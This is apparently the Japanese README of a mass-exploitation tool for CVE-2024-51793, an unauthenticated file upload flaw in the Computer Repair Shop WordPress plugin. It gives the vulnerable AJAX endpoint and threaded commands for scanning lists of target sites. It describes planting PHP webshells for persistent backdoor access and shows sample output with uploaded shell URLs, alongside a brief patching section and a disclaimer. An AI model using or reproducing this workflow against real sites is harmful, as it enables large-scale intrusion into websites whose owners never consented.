
WordPress Computer Repair ShopプラグインのCVE-2024-51793認証なし任意ファイルアップロードを悪用します。ターゲットリストをスキャンし、PHPウェブシェルをアップロードして、脆弱なサイトを報告します。
CVE-2024-51793 エクスプロイトツール ドキュメント 📋 概要 CVE-2024-51793 は、Computer Repair Shop WordPress プラグイン(バージョン 3.8116 より前)における未認証の任意ファイルアップロードの脆弱性です。この脆弱性により、攻撃者は認証なしで PHP ウェブシェルを含む任意のファイルをアップロードでき、脆弱な WordPress サイトへのリモートコード実行につながります。
🚨 脆弱性の詳細 CVE ID: CVE-2024-51793
脆弱性の種類: 未認証の任意ファイルアップロード
影響を受けるプラグイン: Computer Repair Shop WordPress Plugin
影響を受けるバージョン: < 3.8116
リスクレベル: Critical (CVSS スコア: 9.8)
🔧 技術的詳細 この脆弱性は、プラグインの wc_upload_file_ajax アクションハンドラに存在し、ファイルタイプとユーザー認証の検証が適切に行われないため、未認証の攻撃者が悪意のあるファイルをサーバーに直接アップロードできるようになります。
📦 インストールと要件 前提条件 Python 3.6+
必要なパッケージ: requests
インストール bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ 使用方法 基本的な使い方 bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 高度な使い方 bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose コマンドライン引数
| 引数 | 短縮形 | 説明 | デフォルト |
|---|---|---|---|
--list | -l | ターゲットURLを含むファイルへのパス (必須) | - |
--threads | -t | 同時実行スレッド数 | 50 |
--output | -o | 結果の出力ディレクトリ | results |
| 入力ファイル形式 | |||
| 各行に1つのURLを記述したテキストファイル(targets.txt)を作成します: |
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 動作の仕組み
text /wp-content/plugins/computer-repair-shop/readme.txt 2. バージョン検出 プラグインに "CRM WordPress Plugin" が含まれ、バージョンが 3.8116 未満であることを確認します。
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. ウェブシェルのペイロード アップロードされたウェブシェルは以下を提供します:
ファイルアップロード機能
基本的なファイル管理
永続的なバックドアアクセス
📊 出力ファイル ツールは主に2つの出力ファイルを生成します:
vulnerable_targets.txt - 確認された脆弱なURLのリスト
webshells.txt - 正常にアップロードされたウェブシェルのURLのリスト
🎯 実行例 bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully 🛡️ 防御策 ウェブサイト管理者向け 緊急の対策:
Computer Repair Shop プラグインをバージョン 3.8116 以降に更新
アップロードされた悪意のあるファイルをすべて削除
既存の侵害の有無をスキャン
予防策:
Webアプリケーションファイアウォール (WAF) の導入
定期的なセキュリティ監査
ファイル整合性監視
セキュリティ研究者向け 認可された環境でのみ使用
責任ある開示の慣行に従う
テスト前に適切な許可を得る
⚠️ 法的および倫理的考慮事項 このツールは教育目的および認可されたセキュリティテスト専用です
自分が所有していないシステムに対する未認可の使用は違法です
ペネトレーションテストの前に必ず適切な許可を取得してください
発見された脆弱性については責任ある開示の慣行に従ってください
🔄 メンテナンス アップデート 定期的に以下を確認してください:
スクリプトの更新と改善
脆弱性ステータスの変更
新しい検出方法
トラブルシューティング よくある問題と解決策:
接続タイムアウト: セッション設定でタイムアウト値を増やす
偽陰性: ターゲットURLがアクセス可能か確認する
レート制限: スレッド数を減らし、遅延を追加する
📞 サポート 問題や改善点については:
プロジェクトリポジトリにIssueを作成
連絡先: TG: @KtN_1990
📚 参考文献 CVE-2024-51793 公式エントリ
WordPress プラグインディレクトリ
[セキュリティアドバイザリの参照]
免責事項: このツールは正当なセキュリティ研究および認可されたペネトレーションテストにのみ使用すべきです。著者はこのツールの誤用や損害について一切の責任を負いません。